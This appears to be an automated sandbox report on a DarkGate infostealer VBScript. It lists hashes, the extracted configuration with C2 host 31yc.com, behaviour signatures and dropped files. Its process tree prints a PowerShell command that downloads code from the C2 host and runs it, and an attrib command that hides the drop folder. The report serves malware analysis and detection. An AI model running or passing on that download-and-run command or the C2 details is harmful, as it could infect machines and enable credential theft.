Overview

overview

10

Static

static

1

QB76678.vbs

windows7-x64

3

QB76678.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-04-2024 16:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    QB76678.vbs

  • Size

    5KB

  • MD5

    5887ae3cc4fb010b40b2bc51abfdc0a6

  • SHA1

    b1ba11715fabbed6fb10065eedfcfe82e24057e4

  • SHA256

    51cbe66857d56d31c77fd7c641f9ca51599094f5e6b57feebed3862a519a10d4

  • SHA512

    29db154dd32298678a9d7c74330886dda95aace22c4dd624ace3b0dc6d870650ff7bd6af43c65a6d144afe2235fb93f15906b2e17849c8c051bf3e8972373531

  • SSDEEP

    96:YMg1GM9rgkCDQYIwBZDclgjUQ4QYZFN3QjUuGNzUoHtDC8X3NXcy:YMg119gkCtL3IqSPN3QzGNzUoNJnNsy

Score
10/10
darkgateadmin888stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

31yc.com

Attributes
  • anti_analysis

    true

  • anti_debug

    false

  • anti_vm

    true

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    BduXyRPb

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QB76678.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '31yc.com/jjwusvmw')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\cvzq\KeyScramblerLogon.exe
        "C:\cvzq\KeyScramblerLogon.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:932
      • C:\Windows\system32\attrib.exe
        "C:\Windows\system32\attrib.exe" +h C:/cvzq/
        3⤵
        • Views/modifies file attributes
        PID:2976

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2fymblk5.3qq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\cvzq\KeyScramblerIE.DLL
    Filesize

    2.3MB

    MD5

    6620436f5269c0a51735d163a4dbf9c5

    SHA1

    cd7068460c7b7476bd8d3c8f4d0a1157e42ffb1c

    SHA256

    9a4bc2af88b6640bc4a6fbdd0830da373a85a4271b704ac9e3d21d5fa5e9b34f

    SHA512

    7d4089f5a1c4cf19200a646ee0faa150a2cb40b3671758ff47ab070fabeb030d417d22598ba601953db55b53ff4f259504eb66092cb83d23b430090257839f7e

    Download Submit

  • C:\cvzq\KeyScramblerLogon.exe
    Filesize

    500KB

    MD5

    c790ebfcb6a34953a371e32c9174fe46

    SHA1

    3ead08d8bbdb3afd851877cb50507b77ae18a4d8

    SHA256

    fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

    SHA512

    74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    Download Submit

  • C:\cvzq\test.txt
    Filesize

    457KB

    MD5

    ecf6f9e6da20648435cf6d1000c048c5

    SHA1

    9ed16c4b16b1e62e156105605975c564995c255f

    SHA256

    29fd65d91b96bb1b03d8cf92c1f425ef0f365a0d5390b9d0598937d8a2d54fec

    SHA512

    b6268f60cc54c3adbcc9fc224146b0a110048f27ef0973e7a2c8e5e0a0e711b631056680762a1756904d366c82c9fc785a19d2ade39e1de8dff9dc10ad4a5de7

    Download Submit

  • memory/932-45-0x0000000002CB0000-0x0000000002D23000-memory.dmp

    Filesize

    460KB

    Download

  • memory/932-44-0x0000000000400000-0x0000000000658000-memory.dmp

    Filesize

    2.3MB

    Download

  • memory/932-42-0x0000000002CB0000-0x0000000002D23000-memory.dmp

    Filesize

    460KB

    Download

  • memory/4020-20-0x000002BB37310000-0x000002BB37320000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4020-19-0x000002BB37310000-0x000002BB37320000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4020-17-0x00007FFE8CBD0000-0x00007FFE8D691000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4020-13-0x000002BB37AA0000-0x000002BB37C62000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/4020-10-0x00007FFE8CBD0000-0x00007FFE8D691000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4020-41-0x00007FFE8CBD0000-0x00007FFE8D691000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4020-11-0x000002BB37310000-0x000002BB37320000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4020-12-0x000002BB37310000-0x000002BB37320000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4020-9-0x000002BB1F0F0000-0x000002BB1F112000-memory.dmp

    Filesize

    136KB

    Download